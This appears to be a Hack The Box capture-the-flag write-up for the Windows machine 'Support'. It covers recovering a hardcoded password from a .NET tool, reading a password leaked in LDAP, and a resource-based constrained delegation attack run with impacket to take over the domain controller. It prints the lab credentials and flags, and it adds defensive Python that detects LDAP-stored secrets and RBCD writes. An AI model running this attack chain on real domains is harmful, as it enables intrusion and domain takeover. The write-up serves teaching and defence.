
Hack The Box

Support

Tags: HTB, Easy, Windows, Active Directory, SMB, LDAP, RBCD

Summary

Support is an Easy Windows Active Directory machine. An anonymous SMB share exposes a custom UserInfo.exe tool whose .NET binary contains a hardcoded, XOR+Base64-"encrypted" password for the ldap account. Authenticated LDAP queries reveal the support user's password in the info attribute, granting WinRM access. BloodHound shows support has GenericAll over the Domain Controller object, which is abused via Resource-Based Constrained Delegation (RBCD) to impersonate Administrator and compromise the DC.

Machine Information

Name      Difficulty   OS        Platform
Support   Easy         Windows   Hack The Box

Attack Path

  1. Nmap identifies a Windows Domain Controller (Kerberos, LDAP, SMB).
  2. Anonymous SMB enumeration finds the support-tools share.
  3. UserInfo.exe is downloaded and decompiled with ilspycmd.
  4. A hardcoded password and its XOR+Base64 routine are recovered.
  5. The routine is reimplemented in Python to recover the ldap password.
  6. Authenticated LDAP reveals the support password in the info attribute.
  7. WinRM access is obtained as support.
  8. SharpHound/BloodHound reveal GenericAll over DC$.
  9. RBCD is configured and used to impersonate Administrator.
  10. The root flag is read on the Domain Controller.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.55.108

[Image: Nmap scan output]

The host was a Windows Domain Controller exposing DNS (53), Kerberos (88), LDAP (389/636/3268), SMB (445), WinRM (5985) and related services. LDAP revealed the domain support.htb and host dc.support.htb, which were added to /etc/hosts.

SMB Enumeration

SMB shares were listed with an anonymous session:

smbclient -L //10.129.55.108/ -N

[Image: SMB share list]

A custom share support-tools ("support staff tools") allowed anonymous access:

smbclient //10.129.55.108/support-tools -U Anonymous -N

[Image: support-tools share listing]

Among the portable tools, the custom UserInfo.exe.zip stood out and was downloaded for analysis.

Binary Analysis — UserInfo.exe

UserInfo.exe was a .NET application, decompiled with ilspycmd:

ilspycmd -p -o decompiled UserInfo.exe

[Image: ilspycmd output]

Hardcoded password

Protected.cs contained an encrypted password and the key used to protect it:


private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E=";
private static byte[] key = Encoding.ASCII.GetBytes("armando");

public static string getPassword()
{
    byte[] array = Convert.FromBase64String(enc_password);
    for (int i = 0; i < array.Length; i++)
        array[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
    return Encoding.Default.GetString(array);
}

The routine Base64-decodes the value, XORs each byte with the key armando, then XORs with 0xDF.

Recovering the password

The routine was reimplemented in Python:

import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E="
key = b"armando"

# Mirror Protected.getPassword(): Base64-decode, XOR each byte with the
# repeating key, then XOR the result with the constant 0xDF.
data = base64.b64decode(enc_password)
password = bytes((data[i] ^ key[i % len(key)]) ^ 0xDF for i in range(len(data)))
print(password.decode())

Recovered password:

nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

LdapQuery.cs confirmed the credential belonged to support\ldap, which bound to LDAP using this password.

[Image: LdapQuery.cs]

LDAP Enumeration

With the ldap credentials, authenticated LDAP queries were possible. Searching the support user's attributes:

ldapsearch -x -H ldap://10.129.55.108 \
  -D 'support\ldap' \
  -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
  -b 'dc=support,dc=htb' \
  '(sAMAccountName=support)' '*'

[Image: LDAP search output]

The info attribute leaked a plaintext password — a classic AD anti-pattern:

info: Ironside47pleasure40Watchful
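Finding leaks of this kind across a whole directory is something a defender can automate. The Python below is added here as an example and is not part of the original writeup: it parses ldapsearch-style LDIF output (comment lines, folded continuation lines and base64 "::" values included) and flags free-text attributes (info, description, comment) whose values look like credentials. The LDIF sample, the account names other than support, and the keyword/token heuristic are constructed for this example.

```python
import base64
import re

# Constructed ldapsearch-style LDIF output for this example (not captured
# from the target). The second account's description is base64-encoded, as
# ldapsearch does for non-ASCII values, and the third one is line-folded.
_B64_DESC = base64.b64encode("Passw\u00f6rd: Winter2024!".encode()).decode()
SAMPLE_LDIF = f"""# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
#
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: user
sAMAccountName: support
info: Ironside47pleasure40Watchful

dn: CN=helpdesk.tmp,CN=Users,DC=support,DC=htb
sAMAccountName: helpdesk.tmp
description:: {_B64_DESC}
comment: Temporary account for the help desk

dn: CN=jane.doe,CN=Users,DC=support,DC=htb
sAMAccountName: jane.doe
description: Help desk technician, second
  floor office

# search result
search: 2
result: 0 Success
"""

# attribute name, ':' or '::' separator, optional space, value
_LINE = re.compile(r"^([\w;\-]+)(::?) ?(.*)$")


def parse_ldif(text):
    """Parse LDIF text into a list of {attribute: [values]} dicts.

    Handles comment lines, folded continuation lines (a leading space) and
    base64 values written as 'attr:: <b64>'. Attribute names are lowercased.
    """
    blocks, current = [], {}
    unfolded = re.sub(r"\n ", "", text)  # join continuation lines
    for line in unfolded.splitlines():
        if not line.strip():              # blank line ends a record
            if current:
                blocks.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = _LINE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(attr.lower(), []).append(value)
    if current:
        blocks.append(current)
    return blocks


FREE_TEXT_ATTRS = ("info", "description", "comment")
# Constructed heuristic: credential keywords, or a space-free token of 10+
# characters mixing letters and digits (the shape of the leaked 'info' value).
_KEYWORD = re.compile(r"(?i)(passw|pwd|credential|secret)")


def looks_like_secret(value):
    if _KEYWORD.search(value):
        return True
    for tok in value.split():
        if len(tok) >= 10 and re.search(r"[A-Za-z]", tok) and re.search(r"\d", tok):
            return True
    return False


def find_exposed_secrets(ldif_text):
    """Return (dn, attribute, value) for each free-text value that looks like a credential."""
    findings = []
    for entry in parse_ldif(ldif_text):
        if "dn" not in entry:             # skip the 'search:'/'result:' trailer block
            continue
        dn = entry["dn"][0]
        for attr in FREE_TEXT_ATTRS:
            for value in entry.get(attr, []):
                if looks_like_secret(value):
                    findings.append((dn, attr, value))
    return findings


if __name__ == "__main__":
    for dn, attr, value in find_exposed_secrets(SAMPLE_LDIF):
        print(f"{dn}: {attr} = {value!r}")
```

To run it against a real export, feed it the output of an ldapsearch over the user container with the three attributes requested (for example '(objectClass=user)' info description comment); any authenticated domain account can read these attributes by default, which is exactly why they are a poor place for secrets.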

Initial Access

support was a member of Remote Management Users, so WinRM access was possible:

evil-winrm -i 10.129.55.108 -u support -p 'Ironside47pleasure40Watchful'

[Image: Evil-WinRM session]

Privilege Escalation

BloodHound — GenericAll over DC$

SharpHound was uploaded and run to collect AD data:

upload SharpHound.exe
./SharpHound.exe -c All --zipfilename support_data

[Image: SharpHound collection]

In BloodHound, with support marked owned, the attack path was clear:

[Image: BloodHound graph]

SUPPORT --[MemberOf]--> SHARED SUPPORT ACCOUNTS --[GenericAll]--> DC.SUPPORT.HTB

GenericAll over the DC$ computer object allows writing msDS-AllowedToActOnBehalfOfOtherIdentity, the attribute that lists which accounts may delegate to DC$ — the basis for RBCD.
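Writes to this attribute are auditable: with directory service change auditing enabled and a SACL on the computer object, the DC records Security event 5136 naming the modified attribute, the actor and the value as an SDDL string. The Python below is added here as an example and is not part of the original writeup: it scans a constructed JSON-lines export of such events, extracts the SIDs granted by the SDDL and rates a value added to an object under the Domain Controllers OU as high. The event shape, the SIDs and the account names are constructed for this example; the OperationType codes %%14674 (value added) and %%14675 (value deleted) are the raw codes Windows logs in 5136 event data.

```python
import json
import re

# Constructed sample: four Security log records in a flattened JSON-lines
# shape (one object per line, EventData fields hoisted to the top level), as
# a log forwarder might emit them. Event 5136 = "A directory service object
# was modified". DNs, names and SIDs are made up for this example.
SAMPLE_LOG = """\
{"EventID": 5136, "SubjectUserName": "support", "ObjectDN": "CN=DC,OU=Domain Controllers,DC=support,DC=htb", "ObjectClass": "computer", "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "OperationType": "%%14674", "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111111111-2222222222-3333333333-1105)"}
{"EventID": 5136, "SubjectUserName": "Administrator", "ObjectDN": "CN=jane.doe,CN=Users,DC=support,DC=htb", "ObjectClass": "user", "AttributeLDAPDisplayName": "description", "OperationType": "%%14674", "AttributeValue": "Help desk technician"}
{"EventID": 5136, "SubjectUserName": "Administrator", "ObjectDN": "CN=WEB01,CN=Computers,DC=support,DC=htb", "ObjectClass": "computer", "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "OperationType": "%%14675", "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111111111-2222222222-3333333333-1106)"}
{"EventID": 4624, "SubjectUserName": "support", "LogonType": "3"}
"""

# One SDDL ACE: (type;flags;rights;object_guid;inherit_object_guid;sid)
_ACE = re.compile(r"\(([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^)]*)\)")

# OperationType codes as logged in raw 5136 event data
_OPS = {"%%14674": "added", "%%14675": "deleted"}


def allowed_sids(sddl):
    """Return the SIDs granted by ACCESS_ALLOWED ('A') ACEs in an SDDL string."""
    return [sid for ace_type, _f, _r, _og, _iog, sid in _ACE.findall(sddl)
            if ace_type == "A"]


def detect_rbcd_changes(log_lines, dc_marker="OU=Domain Controllers"):
    """Flag every 5136 event touching msDS-AllowedToActOnBehalfOfOtherIdentity.

    A value added to an object under the Domain Controllers OU (a simple
    heuristic for 'this is a DC') is rated high; any other change to the
    attribute is rated medium so it is still reviewed.
    """
    alerts = []
    for line in log_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 5136:
            continue
        attr = ev.get("AttributeLDAPDisplayName", "")
        if attr.lower() != "msds-allowedtoactonbehalfofotheridentity":
            continue
        op = _OPS.get(ev.get("OperationType"), "unknown")
        on_dc = dc_marker.lower() in ev.get("ObjectDN", "").lower()
        alerts.append({
            "object": ev.get("ObjectDN"),
            "actor": ev.get("SubjectUserName"),
            "operation": op,
            "delegating_sids": allowed_sids(ev.get("AttributeValue", "")),
            "severity": "high" if (op == "added" and on_dc) else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_rbcd_changes(SAMPLE_LOG):
        print(json.dumps(alert))
```

Resolving each delegating SID back to its account is the natural follow-up; a freshly created computer account (such as the one added under MachineAccountQuota below) appearing in this attribute on a DC is the signature of the technique this writeup uses.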

RBCD attack

Step 1 — Create a fake computer (default MachineAccountQuota=10 allows it):

impacket-addcomputer -computer-name 'FAKE01$' -computer-pass 'FakePass123!' \
  -dc-ip 10.129.55.234 'support.htb/support:Ironside47pleasure40Watchful'

[Image: computer account added]

Step 2 — Configure RBCD on DC$:

impacket-rbcd -delegate-from 'FAKE01$' -delegate-to 'DC$' -action 'write' \
  -dc-ip 10.129.55.234 'support.htb/support:Ironside47pleasure40Watchful'

[Image: RBCD write]

Step 3 — Request a TGS impersonating Administrator:

impacket-getST -spn 'cifs/dc.support.htb' -impersonate 'Administrator' \
  -dc-ip 10.129.55.234 'support.htb/FAKE01$:FakePass123!'

This performed S4U2Self + S4U2Proxy and saved a ticket for Administrator.

Step 4 — Access the DC as Administrator:

export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
impacket-psexec -k -no-pass dc.support.htb

[Image: root shell]

This returned a SYSTEM shell on the Domain Controller.

Flags

User

type C:\Users\support\Desktop\user.txt

User flag

b96cb011d9fce6c42f5ae4fa9625e4b9

Root

type C:\Users\Administrator\Desktop\root.txt

Root flag

bb3442b0343a5d2a27d89eee89fddb86

Vulnerabilities Identified

Anonymous SMB Share Access

Impact: disclosure of a custom tool containing embedded credentials.

Hardcoded Password in .NET Binary

Impact: trivially reversible; equivalent to storing the password in plaintext.

Plaintext Password in AD info Attribute

Impact: any authenticated user could recover the credential.

GenericAll over the Domain Controller

Impact: impersonation of any domain user, including Administrator.

Default MachineAccountQuota

Impact: any authenticated user may add up to 10 computer accounts, supplying the controlled account that the RBCD attack requires.

Tools Used

Key Takeaways